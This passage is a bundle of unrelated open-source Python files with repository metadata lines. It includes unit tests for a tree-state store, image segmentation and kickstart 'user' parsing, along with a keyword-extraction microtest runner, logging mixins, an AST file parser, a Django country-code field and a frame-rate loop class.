self.assertTrue("a" in tree)
self.assertFalse("b" in tree)
self.assertEqual(tree.getmetadata(), b"1")
tree = treestate.treestate(treepath, rootid2)
self.assertFalse("a" in tree)
self.assertTrue("b" in tree)
self.assertEqual(tree.getmetadata(), b"2")
def testsaveas(self):
treepath = os.path.join(testtmp, "saveas")
tree = treestate.treestate(treepath, 0)
tree.insert("a", 1, 2, 3, 4, None)
tree.setmetadata(b"1")
tree.flush()
tree.insert("b", 1, 2, 3, 4, None)
tree.remove("a")
treepath = "%s-savedas" % treepath
tree.setmetadata(b"2")
rootid = tree.saveas(treepath)
tree = treestate.treestate(treepath, rootid)
self.assertFalse("a" in tree)
self.assertTrue("b" in tree)
self.assertEqual(tree.getmetadata(), b"2")
def testfiltered(self):
treepath = os.path.join(testtmp, "filtered")
tree = treestate.treestate(treepath, 0)
tree.insert("a/B/c", 1, 2, 3, 4, None)
filtered = tree.getfiltered("A/B/C", lambda x: x.upper(), 1)
self.assertEqual(filtered, ["a/B/c"])
filtered = tree.getfiltered("A/B/C", lambda x: x, 2)
self.assertEqual(filtered, [])
def testpathcomplete(self):
treepath = os.path.join(testtmp, "pathcomplete")
tree = treestate.treestate(treepath, 0)
paths = ["a/b/c", "a/b/d", "a/c", "de"]
for path in paths:
tree.insert(path, 1, 2, 3, 4, None)
def complete(prefix, fullpath=False):
completed = []
tree.pathcomplete(prefix, 0, 0, completed.append, fullpath)
return completed
self.assertEqual(complete(""), ["a/", "de"])
self.assertEqual(complete("d"), ["de"])
self.assertEqual(complete("a/"), ["a/b/", "a/c"])
self.assertEqual(complete("a/b/"), ["a/b/c", "a/b/d"])
self.assertEqual(complete("a/b/c"), ["a/b/c"])
self.assertEqual(complete("", True), paths)
def testgetdir(self):
treepath = os.path.join(testtmp, "filtered")
tree = treestate.treestate(treepath, 0)
tree.insert("a/b/c", 3, 0, 0, 0, None)
tree.insert("a/d", 5, 0, 0, 0, None)
self.assertEqual(tree.getdir("/"), (3 | 5, 3 & 5))
self.assertEqual(tree.getdir("a/"), (3 | 5, 3 & 5))
self.assertEqual(tree.getdir("a/b/"), (3, 3))
self.assertIsNone(tree.getdir("a/b/c/"))
tree.insert("a/e/f", 10, 0, 0, 0, None)
self.assertEqual(tree.getdir("a/"), (3 | 5 | 10, 3 & 5 & 10))
tree.remove("a/e/f")
self.assertEqual(tree.getdir("a/"), (3 | 5, 3 & 5))
def testsubdirquery(self):
treepath = os.path.join(testtmp, "subdir")
tree = treestate.treestate(treepath, 0)
paths = ["a/b/c", "a/b/d", "a/c", "de"]
for path in paths:
tree.insert(path, 1, 2, 3, 4, None)
self.assertEqual(tree.tracked(""), paths)
self.assertEqual(tree.tracked("de"), ["de"])
self.assertEqual(tree.tracked("a"), [])
self.assertEqual(tree.tracked("a/"), ["a/b/c", "a/b/d", "a/c"])
self.assertEqual(tree.tracked("a/b/"), ["a/b/c", "a/b/d"])
self.assertEqual(tree.tracked("a/b"), [])
self.assertEqual(tree.tracked("a/c/"), [])
self.assertEqual(tree.tracked("a/c"), ["a/c"])
if __name__ == "__main__":
silenttestrunner.main(__name__)
| facebookexperimental/eden | eden/scm/tests/test-treestate.py | Python | gpl-2.0 | 9,519 | 0 |
# -*- coding: utf-8 -*-
"""Module for running microtests on how well the extraction works -
this module is STANDALONE safe"""
import ConfigParser
import glob
import traceback
import codecs
import bibclassify_config as bconfig
import bibclassify_engine as engine
log = bconfig.get_logger("bibclassify.microtest")
def run(glob_patterns,
verbose=20,
plevel = 1
):
"""Execute microtests"""
if verbose is not None:
log.setLevel(int(verbose))
results = {}
for pattern in glob_patterns:
log.info("Looking for microtests: %s" % pattern)
for cfgfile in glob.glob(pattern):
log.debug("processing: %s" % (cfgfile))
try:
test_cases = load_microtest_definition(cfgfile)
run_microtest_suite(test_cases, results=results, plevel=plevel)
except Exception, msg:
log.error('Error running microtest: %s' % cfgfile)
log.error(msg)
log.error(traceback.format_exc())
summarize_results(results, plevel)
def run_microtest_suite(test_cases, results={}, plevel=1):
"""Runs all tests from the test_case
@var test_cases: microtest definitions
@keyword results: dict, where results are cummulated
@keyword plevel: int [0..1], performance level, results
below the plevel are considered unsuccessful
@return: nothing
"""
config = {}
if 'config' in test_cases:
config = test_cases['config']
del(test_cases['config'])
if 'taxonomy' not in config:
config['taxonomy'] = ['HEP']
for test_name in sorted(test_cases.keys()):
test = test_cases[test_name]
try:
log.debug('section: %s' % test_name)
phrase = test['phrase'][0]
(skw, ckw, akw, acr) = engine.get_keywords_from_text(test['phrase'], config['taxonomy'][0], output_mode="raw")
details = analyze_results(test, (skw, ckw) )
if details["plevel"] < plevel:
log.error("\n" + format_test_case(test))
log.error("results\n" + format_details(details))
else:
log.info("Success for section: %s" % (test_name))
log.info("\n" + format_test_case(test))
if plevel != 1:
log.info("results\n" + format_details(details))
results.setdefault(test_name, [])
results[test_name].append(details)
except Exception, msg:
log.error('Operational error executing section: %s' % test_name)
#log.error(msg)
log.error(traceback.format_exc())
def summarize_results(results, plevel):
total = 0
success = 0
for k,v in results.items():
total += len(v)
success += len(filter(lambda x: x["plevel"] >= plevel, v))
log.info("Total number of micro-tests run: %s" % total)
log.info("Success/failure: %d/%d" % (success, total-success))
def format_details(details):
plevel = details["plevel"]
details["plevel"] = [plevel]
out = format_test_case(details)
details["plevel"] = plevel
return out
def format_test_case(test_case):
padding = 13
keys = ["phrase", "expected", "unwanted"]
out = ["" for x in range(len(keys))]
out2 = []
for key in test_case.keys():
phrase = "\n".join(map(lambda x: (" " * (padding + 1) ) + str(x), test_case[key]))
if key in keys:
out[keys.index(key)] = "%s=%s" % (key.rjust(padding-1), phrase[padding:])
else:
out2.append("%s=%s" % (key.rjust(padding-1), phrase[padding:]))
if filter(len, out) and filter(len, out2):
return "%s\n%s" % ("\n".join(filter(len, out)), "\n".join(out2))
else:
return "%s%s" % ("\n".join(filter(len, out)), "\n".join(out2))
def analyze_results(test_case, results):
skw = results[0]
ckw = results[1]
details = {"correct" : [], "incorrect": [],
"plevel" : 0}
responses_total = len(skw) + len(ckw)
expected_total = len(test_case["expected"])
correct_responses = 0
incorrect_responses = 0
for result_set in (skw, ckw):
for r in result_set:
try:
val = r[0].output()
except:
val = r.output()
if r in test_case["expected"]:
correct_responses += 1
details["correct"].append(val)
else:
incorrect_responses += 1
details["incorrect"].append(val)
details["plevel"] = ((responses_total + expected_total) - incorrect_responses) / (responses_total + expected_total)
return details
def load_microtest_definition(cfgfile, **kwargs):
"""Loads data from the microtest definition file
{
section-1:
phrase: [ some-string]
expected: [some, string]
unwanted: [some-string]
section-2:
.....
}
"""
config = {}
cfg = ConfigParser.ConfigParser()
fo = codecs.open(cfgfile, 'r', 'utf-8')
cfg.readfp(fo, filename=cfgfile)
for s in cfg.sections():
if s in config:
log.error('two sections with the same name')
config[s] = {}
for k, v in cfg.items(s):
if "\n" in v:
v = filter(len, v.splitlines())
else:
v = [v.strip()]
if k not in config[s]:
config[s][k] = []
config[s][k] += v
fo.close()
return config
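# Example of a microtest definition file in the format parsed above (the section
# name and keyword values are invented for illustration):
#
#   [dilepton-test]
#   phrase = we measure the dilepton invariant mass spectrum
#   expected = dilepton
#       invariant mass
#   unwanted = neutrino
#
# Multi-line values are split into lists; single-line values become one-element lists.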
if __name__ == "__main__":
import os, sys
test_paths = []
if len(sys.argv) > 1 and sys.argv[1] == "demo":
test_paths.append(os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)),
"bibclassify/microtest*.cfg")))
test_paths.append(os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)),
"../../../etc/bibclassify/microtest*.cfg")))
run(test_paths)
elif (len(sys.argv) > 1):
for p in sys.argv[1:]:
if p[0] == os.path.sep: # absolute path
test_paths.append(p)
else: # try to detect if we shall prepend rootdir
first = p.split(os.path.sep)[0]
if os.path.exists(first): #probably relative path
test_paths.append(p)
                elif os.path.exists(os.path.join(bconfig.CFG_PREFIX, first)):  # relative to root
test_paths.append(os.path.join(bconfig.CFG_PREFIX, p))
log.warning('Resolving relative path %s -> %s' % (p, test_paths[-1]))
else:
raise Exception ('Please check the glob pattern: %s\n\
it seems to be a relative path, but not relative to the script, nor to the invenio rootdir' % p)
run(test_paths)
else:
print 'Usage: %s glob_pattern [glob_pattern...]\nExample: %s %s/etc/bibclassify/microtest*.cfg' % (sys.argv[0],
sys.argv[0],
bconfig.CFG_PREFIX,
)
| pombredanne/invenio-old | modules/bibclassify/lib/bibclassify_microtests.py | Python | gpl-2.0 | 7,289 | 0.005076 |
#/usr/bin/env python
# -#- coding: utf-8 -#-
#
# equity_master/common.py - equity master common classes
#
# standard copy right text
#
# Initial version: 2012-04-02
# Author: Amnon Janiv
"""
.. module:: equity_master/common
:synopsis: miscellaneous abstract classes and other core constructs
.. moduleauthor:: Amnon Janiv
"""
__revision__ = '$Id: $'
__version__ = '0.0.1'
import sys
import logging
from equity_master import util
class UnicodeMixin(object):
"""Unicode mixin class to help in
python 2 to python 3 migration
"""
if sys.version_info[0] >= 3: # Python 3
def __str__(self):
return self.__unicode__()
else:
# Python 2
def __str__(self):
return self.__unicode__().encode('utf8')
class ExecutionError(UnicodeMixin, Exception):
"""Execution error class
"""
def __init__(
self,
traceback=None,
wrapped_ex=None,
args=None,
kwargs=None
):
super(ExecutionError, self).__init__(args, kwargs)
self.traceback = traceback
self.wrapped_ex = wrapped_ex
def __unicode__(self):
return util.pretty_args(*self.args)
class EquityMasterError(ExecutionError):
"""EquityMaster package error class
"""
pass
class ClassMixin(object):
"""Class mixin abstraction
"""
def class_name(self):
return util.class_name(self)
class ErrorMixin(object):
"""Error mixin class
"""
def error(
self,
exc_class,
logger,
tmpl,
*args,
**kwargs
):
"""Log and raise an error"""
util.log_raise(exc_class, logger, logging.ERROR, tmpl, *args, **kwargs)
def fatal(
self,
exc_class,
logger,
tmpl,
*args,
**kwargs):
"""Log and exit"""
pass
class LoggingMixin(object):
"""Log utilities abstraction
"""
def log(
self,
logger,
severity,
tmpl,
*args,
**kwargs
):
util.log(logger, severity, tmpl, *args, **kwargs)
def debug(
self,
logger,
tmpl,
*args,
**kwargs
):
"""Log a debug message"""
util.log(logger, logging.DEBUG, tmpl, *args, **kwargs)
def info(self,
logger,
tmpl,
*args,
**kwargs):
util.log(logger, logging.INFO, tmpl, *args, **kwargs)
def warn(self,
logger,
tmpl,
*args,
**kwargs):
util.log(logger, logging.WARNING, tmpl, *args, **kwargs)
def log_error(self,
logger,
tmpl,
*args,
**kwargs):
util.log(logger, logging.ERROR, tmpl, *args, **kwargs)
class BusinessObject(UnicodeMixin, ClassMixin, ErrorMixin,
LoggingMixin, object):
"""Base class business object
Facilitates creation of complex object graphs with
reduced development and maintenance costs, flexible,
yet with rich functionality
"""
def is_valid(self):
"""Check if object instance is valid
Demonstrates abstract method construct
"""
        raise NotImplementedError
| ajaniv/equitymaster | equity_master/common.py | Python | gpl-2.0 | 3,296 | 0.01426 |
import ast
import os
class Parser(object):
"""
Find all *.py files inside `repo_path` and parse its into ast nodes.
If file has syntax errors SyntaxError object will be returned except
ast node.
"""
def __init__(self, repo_path):
if not os.path.isabs(repo_path):
raise ValueError('Repository path is not absolute: %s' % repo_path)
self.repo_path = repo_path
def walk(self):
"""
Yield absolute paths to all *.py files inside `repo_path` directory.
"""
for root, dirnames, filenames in os.walk(self.repo_path):
for filename in filenames:
if filename.endswith('.py'):
yield os.path.join(root, filename)
def relpath(self, path):
return os.path.relpath(path, self.repo_path)
def parse_file(self, path):
relpath = self.relpath(path)
with open(path) as f:
content = f.read()
try:
return (relpath, ast.parse(content, relpath))
except SyntaxError, e:
return (relpath, e)
def parse(self):
return dict(self.parse_file(filepath) for filepath in self.walk())
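# Usage sketch (run as a script; the single command-line argument is assumed to be
# an absolute path to a repository):
if __name__ == '__main__':
    import sys
    parsed = Parser(sys.argv[1]).parse()
    for relpath in sorted(parsed):
        node = parsed[relpath]
        status = 'syntax error' if isinstance(node, SyntaxError) else 'ok'
        print '%s: %s' % (relpath, status)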
| beni55/djangolint | project/lint/parsers.py | Python | isc | 1,186 | 0 |
# coding=UTF-8
# Copyright 2011 James O'Neill
#
# This file is part of Kapua.
#
# Kapua is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Kapua is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Kapua. If not, see <http://www.gnu.org/licenses/>.
from django.utils.translation import ugettext as _
from django.db import models
#adapted from http://www.djangosnippets.org/snippets/494/
#using UN country and 3 char code list from http://unstats.un.org/unsd/methods/m49/m49alpha.htm
#correct as of 17th October 2008
COUNTRIES = (
('AFG', _('Afghanistan')),
('ALA', _('Aland Islands')),
('ALB', _('Albania')),
('DZA', _('Algeria')),
('ASM', _('American Samoa')),
('AND', _('Andorra')),
('AGO', _('Angola')),
('AIA', _('Anguilla')),
('ATG', _('Antigua and Barbuda')),
('ARG', _('Argentina')),
('ARM', _('Armenia')),
('ABW', _('Aruba')),
('AUS', _('Australia')),
('AUT', _('Austria')),
('AZE', _('Azerbaijan')),
('BHS', _('Bahamas')),
('BHR', _('Bahrain')),
('BGD', _('Bangladesh')),
('BRB', _('Barbados')),
('BLR', _('Belarus')),
('BEL', _('Belgium')),
('BLZ', _('Belize')),
('BEN', _('Benin')),
('BMU', _('Bermuda')),
('BTN', _('Bhutan')),
('BOL', _('Bolivia')),
('BES', _('Bonaire, Saint Eustatius and Saba')),
('BIH', _('Bosnia and Herzegovina')),
('BWA', _('Botswana')),
('BRA', _('Brazil')),
('VGB', _('British Virgin Islands')),
('BRN', _('Brunei Darussalam')),
('BGR', _('Bulgaria')),
('BFA', _('Burkina Faso')),
('BDI', _('Burundi')),
('KHM', _('Cambodia')),
('CMR', _('Cameroon')),
('CAN', _('Canada')),
('CPV', _('Cape Verde')),
('CYM', _('Cayman Islands')),
('CAF', _('Central African Republic')),
('TCD', _('Chad')),
('CIL', _('Channel Islands')),
('CHL', _('Chile')),
('CHN', _('China')),
('HKG', _('China - Hong Kong')),
('MAC', _('China - Macao')),
('COL', _('Colombia')),
('COM', _('Comoros')),
('COG', _('Congo')),
('COK', _('Cook Islands')),
('CRI', _('Costa Rica')),
('CIV', _('Cote d\'Ivoire')),
('HRV', _('Croatia')),
('CUB', _('Cuba')),
('CUW', _(u'Curaçao')),
('CYP', _('Cyprus')),
('CZE', _('Czech Republic')),
('PRK', _('Democratic People\'s Republic of Korea')),
('COD', _('Democratic Republic of the Congo')),
('DNK', _('Denmark')),
('DJI', _('Djibouti')),
('DMA', _('Dominica')),
('DOM', _('Dominican Republic')),
('ECU', _('Ecuador')),
('EGY', _('Egypt')),
('SLV', _('El Salvador')),
('GNQ', _('Equatorial Guinea')),
('ERI', _('Eritrea')),
('EST', _('Estonia')),
('ETH', _('Ethiopia')),
('FRO', _('Faeroe Islands')),
('FLK', _('Falkland Islands (Malvinas)')),
('FJI', _('Fiji')),
('FIN', _('Finland')),
('FRA', _('France')),
('GUF', _('French Guiana')),
('PYF', _('French Polynesia')),
('GAB', _('Gabon')),
('GMB', _('Gambia')),
('GEO', _('Georgia')),
('DEU', _('Germany')),
('GHA', _('Ghana')),
('GIB', _('Gibraltar')),
('GRC', _('Greece')),
('GRL', _('Greenland')),
('GRD', _('Grenada')),
('GLP', _('Guadeloupe')),
('GUM', _('Guam')),
('GTM', _('Guatemala')),
('GGY', _('Guernsey')),
('GIN', _('Guinea')),
('GNB', _('Guinea-Bissau')),
('GUY', _('Guyana')),
('HTI', _('Haiti')),
('VAT', _('Holy See (Vatican City)')),
('HND', _('Honduras')),
('HUN', _('Hungary')),
('ISL', _('Iceland')),
('IND', _('India')),
('IDN', _('Indonesia')),
('IRN', _('Iran')),
('IRQ', _('Iraq')),
('IRL', _('Ireland')),
('IMN', _('Isle of Man')),
('ISR', _('Israel')),
('ITA', _('Italy')),
('JAM', _('Jamaica')),
('JPN', _('Japan')),
('JEY', _('Jersey')),
('JOR', _('Jordan')),
('KAZ', _('Kazakhstan')),
('KEN', _('Kenya')),
('KIR', _('Kiribati')),
('KWT', _('Kuwait')),
('KGZ', _('Kyrgyzstan')),
('LAO', _('Lao People\'s Democratic Republic')),
('LVA', _('Latvia')),
('LBN', _('Lebanon')),
('LSO', _('Lesotho')),
('LBR', _('Liberia')),
('LBY', _('Libyan Arab Jamahiriya')),
('LIE', _('Liechtenstein')),
('LTU', _('Lithuania')),
('LUX', _('Luxembourg')),
('MKD', _('Macedonia')),
('MDG', _('Madagascar')),
('MWI', _('Malawi')),
('MYS', _('Malaysia')),
('MDV', _('Maldives')),
('MLI', _('Mali')),
('MLT', _('Malta')),
('MHL', _('Marshall Islands')),
('MTQ', _('Martinique')),
('MRT', _('Mauritania')),
('MUS', _('Mauritius')),
('MYT', _('Mayotte')),
('MEX', _('Mexico')),
('FSM', _('Micronesia, Federated States of')),
('MCO', _('Monaco')),
('MNG', _('Mongolia')),
('MNE', _('Montenegro')),
('MSR', _('Montserrat')),
('MAR', _('Morocco')),
('MOZ', _('Mozambique')),
('MMR', _('Myanmar')),
('NAM', _('Namibia')),
('NRU', _('Nauru')),
('NPL', _('Nepal')),
('NLD', _('Netherlands')),
('ANT', _('Netherlands Antilles')),
('NCL', _('New Caledonia')),
('NZL', _('New Zealand')),
('NIC', _('Nicaragua')),
('NER', _('Niger')),
('NGA', _('Nigeria')),
('NIU', _('Niue')),
('NFK', _('Norfolk Island')),
('MNP', _('Northern Mariana Islands')),
('NOR', _('Norway')),
('PSE', _('Occupied Palestinian Territory')),
('OMN', _('Oman')),
('PAK', _('Pakistan')),
('PLW', _('Palau')),
('PAN', _('Panama')),
('PNG', _('Papua New Guinea')),
('PRY', _('Paraguay')),
('PER', _('Peru')),
('PHL', _('Philippines')),
('PCN', _('Pitcairn')),
('POL', _('Poland')),
('PRT', _('Portugal')),
('PRI', _('Puerto Rico')),
('QAT', _('Qatar')),
('KOR', _('Republic of Korea')),
('MDA', _('Republic of Moldova')),
('REU', _('Reunion')),
('ROU', _('Romania')),
('RUS', _('Russian Federation')),
('RWA', _('Rwanda')),
('BLM', _('Saint-Barthelemy')),
('SHN', _('Saint Helena')),
('KNA', _('Saint Kitts and Nevis')),
('LCA', _('Saint Lucia')),
('MAF', _('Saint-Martin (French part)')),
('SPM', _('Saint Pierre and Miquelon')),
('VCT', _('Saint Vincent and the Grenadines')),
('WSM', _('Samoa')),
('SMR', _('San Marino')),
('STP', _('Sao Tome and Principe')),
('SAU', _('Saudi Arabia')),
('SEN', _('Senegal')),
('SRB', _('Serbia')),
('SYC', _('Seychelles')),
('SLE', _('Sierra Leone')),
('SGP', _('Singapore')),
('SXM', _('Sint Maarten (Dutch part)')),
('SVK', _('Slovakia')),
('SVN', _('Slovenia')),
('SLB', _('Solomon Islands')),
('SOM', _('Somalia')),
('ZAF', _('South Africa')),
('SSD', _('South Sudan')),
('ESP', _('Spain')),
('LKA', _('Sri Lanka')),
('SDN', _('Sudan')),
('SUR', _('Suriname')),
('SJM', _('Svalbard and Jan Mayen Islands')),
('SWZ', _('Swaziland')),
('SWE', _('Sweden')),
('CHE', _('Switzerland')),
('SYR', _('Syrian Arab Republic')),
('TJK', _('Tajikistan')),
('THA', _('Thailand')),
('TLS', _('Timor-Leste')),
('TGO', _('Togo')),
('TKL', _('Tokelau')),
('TON', _('Tonga')),
('TTO', _('Trinidad and Tobago')),
('TUN', _('Tunisia')),
('TUR', _('Turkey')),
('TKM', _('Turkmenistan')),
('TCA', _('Turks and Caicos Islands')),
('TUV', _('Tuvalu')),
('UGA', _('Uganda')),
('UKR', _('Ukraine')),
('ARE', _('United Arab Emirates')),
('GBR', _('United Kingdom')),
('TZA', _('United Republic of Tanzania')),
('USA', _('United States of America')),
('VIR', _('United States Virgin Islands')),
('URY', _('Uruguay')),
('UZB', _('Uzbekistan')),
('VUT', _('Vanuatu')),
('VEN', _('Venezuela (Bolivarian Republic of)')),
('VNM', _('Viet Nam')),
('WLF', _('Wallis and Futuna Islands')),
('ESH', _('Western Sahara')),
('YEM', _('Yemen')),
('ZMB', _('Zambia')),
('ZWE', _('Zimbabwe')),
)
class CountryField(models.CharField):
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 3)
kwargs.setdefault('choices', COUNTRIES)
super(CountryField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "CharField"
| hemebond/kapua | forms.py | Python | gpl-3.0 | 7,905 | 0.031883 |
import numpy as np
from morphsnakes import (morphological_chan_vese,
morphological_geodesic_active_contour,
inverse_gaussian_gradient,
circle_level_set, checkerboard_level_set)
from numpy.testing import assert_array_equal
import pytest
def gaussian_blob():
coords = np.mgrid[-5:6, -5:6]
sqrdistances = (coords ** 2).sum(0)
return np.exp(-sqrdistances / 10)
def test_morphsnakes_incorrect_image_shape():
img = np.zeros((10, 10, 3))
ls = np.zeros((10, 9))
with pytest.raises(ValueError):
morphological_chan_vese(img, iterations=1, init_level_set=ls)
with pytest.raises(ValueError):
morphological_geodesic_active_contour(img, iterations=1,
init_level_set=ls)
def test_morphsnakes_incorrect_ndim():
img = np.zeros((4, 4, 4, 4))
ls = np.zeros((4, 4, 4, 4))
with pytest.raises(ValueError):
morphological_chan_vese(img, iterations=1, init_level_set=ls)
with pytest.raises(ValueError):
morphological_geodesic_active_contour(img, iterations=1,
init_level_set=ls)
def test_morphsnakes_black():
img = np.zeros((11, 11))
ls = circle_level_set(img.shape, (5, 5), 3)
ref_zeros = np.zeros(img.shape, dtype=np.int8)
ref_ones = np.ones(img.shape, dtype=np.int8)
acwe_ls = morphological_chan_vese(img, iterations=6, init_level_set=ls)
assert_array_equal(acwe_ls, ref_zeros)
gac_ls = morphological_geodesic_active_contour(img, iterations=6,
init_level_set=ls)
assert_array_equal(gac_ls, ref_zeros)
gac_ls2 = morphological_geodesic_active_contour(img, iterations=6,
init_level_set=ls,
balloon=1, threshold=-1,
smoothing=0)
assert_array_equal(gac_ls2, ref_ones)
assert acwe_ls.dtype == gac_ls.dtype == gac_ls2.dtype == np.int8
def test_morphsnakes_simple_shape_chan_vese():
img = gaussian_blob()
ls1 = circle_level_set(img.shape, (5, 5), 3)
ls2 = circle_level_set(img.shape, (5, 5), 6)
acwe_ls1 = morphological_chan_vese(img, iterations=10, init_level_set=ls1)
acwe_ls2 = morphological_chan_vese(img, iterations=10, init_level_set=ls2)
assert_array_equal(acwe_ls1, acwe_ls2)
assert acwe_ls1.dtype == acwe_ls2.dtype == np.int8
def test_morphsnakes_simple_shape_geodesic_active_contour():
img = np.float_(circle_level_set((11, 11), (5, 5), 3.5))
gimg = inverse_gaussian_gradient(img, alpha=10.0, sigma=1.0)
ls = circle_level_set(img.shape, (5, 5), 6)
ref = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]],
dtype=np.int8)
gac_ls = morphological_geodesic_active_contour(gimg, iterations=10,
init_level_set=ls,
balloon=-1)
assert_array_equal(gac_ls, ref)
assert gac_ls.dtype == np.int8
def test_init_level_sets():
image = np.zeros((6, 6))
checkerboard_ls = morphological_chan_vese(image, 0, 'checkerboard')
checkerboard_ref = np.array([[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[0, 0, 0, 0, 0, 1],
[1, 1, 1, 1, 1, 0]], dtype=np.int8)
circle_ls = morphological_geodesic_active_contour(image, 0, 'circle')
circle_ref = np.array([[0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 0]], dtype=np.int8)
ellipsoid_ls = morphological_chan_vese(np.zeros((7, 9)), 0, 'ellipsoid')
ellipsoid_ref = np.array(
[[0, 0, 1, 1, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 1, 1, 0, 0]],
dtype=np.uint8
)
assert_array_equal(checkerboard_ls, checkerboard_ref)
assert_array_equal(circle_ls, circle_ref)
assert_array_equal(ellipsoid_ls, ellipsoid_ref)
def test_morphsnakes_3d():
image = np.zeros((7, 7, 7))
evolution = []
def callback(x):
evolution.append(x.sum())
ls = morphological_chan_vese(image, 5, 'circle',
iter_callback=callback)
# Check that the initial circle level set is correct
assert evolution[0] == 81
# Check that the final level set is correct
assert ls.sum() == 0
# Check that the contour is shrinking at every iteration
for v1, v2 in zip(evolution[:-1], evolution[1:]):
assert v1 >= v2
if __name__ == "__main__":
np.testing.run_module_suite()
| pmneila/morphsnakes | test_morphsnakes.py | Python | bsd-3-clause | 5,724 | 0 |
#
# Martin Gracik <mgracik@redhat.com>
#
# Copyright 2009 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat
# trademarks that are incorporated in the source code or documentation are not
# subject to the GNU General Public License and may only be used or replicated
# with the express permission of Red Hat, Inc.
#
import unittest
from tests.baseclass import CommandTest, CommandSequenceTest
from pykickstart.errors import KickstartParseError, KickstartValueError
class FC6_TestCase(CommandTest):
command = "user"
def runTest(self):
# pass
self.assert_parse("user --name=user", "user --name=user\n")
self.assert_parse("user --name=user --groups=grp1,grp2 --homedir=/home/user --shell=/bin/bash --uid=1000 --password=secret --iscrypted",
"user --groups=grp1,grp2 --homedir=/home/user --name=user --password=secret --iscrypted --shell=/bin/bash --uid=1000\n")
self.assert_parse("user --name=user --groups=grp1", "user --groups=grp1 --name=user\n")
self.assert_parse("user --name=user --homedir=/home/user --shell=/bin/bash", "user --homedir=/home/user --name=user --shell=/bin/bash\n")
self.assert_parse("user --name=user --password=secret", "user --name=user --password=secret\n")
self.assert_parse("user --name=user --uid=1000", "user --name=user --uid=1000\n")
self.assertFalse(self.assert_parse("user --name=user") == None)
self.assertTrue(self.assert_parse("user --name=userA") != \
self.assert_parse("user --name=userB"))
self.assertFalse(self.assert_parse("user --name=userA") == \
self.assert_parse("user --name=userB"))
# fail
# missing required option --name
self.assert_parse_error("user", KickstartValueError)
# --name requires an argument
self.assert_parse_error("user --name", KickstartParseError)
# --uid requires int argument
self.assert_parse_error("user --name=user --uid=id", KickstartParseError)
# unknown option
self.assert_parse_error("user --name=user --unknown=value", KickstartParseError)
# required option arguments
self.assert_parse_error("user --name=user --groups", KickstartParseError)
self.assert_parse_error("user --name=user --homedir", KickstartParseError)
self.assert_parse_error("user --name=user --shell", KickstartParseError)
self.assert_parse_error("user --name=user --uid", KickstartParseError)
self.assert_parse_error("user --name=user --password", KickstartParseError)
class FC6_Duplicate_TestCase(CommandSequenceTest):
def runTest(self):
# pass - can use the command twice, as long as they have different names
self.assert_parse("""
user --name=userA
user --name=userB""")
# fail - can't have two users with the same name
self.assert_parse_error("""
user --name=userA
user --name=userA""", UserWarning)
class F8_TestCase(FC6_TestCase):
def runTest(self):
# run FC6 test case
FC6_TestCase.runTest(self)
# pass
self.assert_parse("user --name=user --lock --plaintext", "user --name=user --lock\n")
self.assert_parse("user --name=user --lock", "user --name=user --lock\n")
self.assert_parse("user --name=user --plaintext", "user --name=user\n")
# fail
class F12_TestCase(F8_TestCase):
def runTest(self):
# run F8 test case
F8_TestCase.runTest(self)
# pass
self.assert_parse("user --name=user --gecos=\"User Name\"", "user --name=user --gecos=\"User Name\"\n")
class F19_TestCase(F12_TestCase):
def runTest(self):
# run F12 test case
F12_TestCase.runTest(self)
# pass
self.assert_parse("user --name=user --gid=500", "user --name=user --gid=500\n")
if __name__ == "__main__":
unittest.main()
| cgwalters/pykickstart | tests/commands/user.py | Python | gpl-2.0 | 4,536 | 0.005291 |
import time
DEFAULT_SLEEP_FACTOR = 0.8
class Loop(object):
class LoopInterruptException(Exception):
pass
def __init__(self, fps, timeshift=0, sleep_factor=DEFAULT_SLEEP_FACTOR):
"""
Sleep factor could be set to 1.0? as python 3.5 respects time better
"""
self.set_period(fps, timeshift)
self.profile_timelog = []
self.sleep_factor = sleep_factor
def set_period(self, fps, timeshift=0):
assert fps > 0, 'fps rate must be provided'
assert timeshift >= 0, 'timeshift must be positive'
self.fps = fps
self.period = 1 / fps
self.start_time = time.time() - timeshift
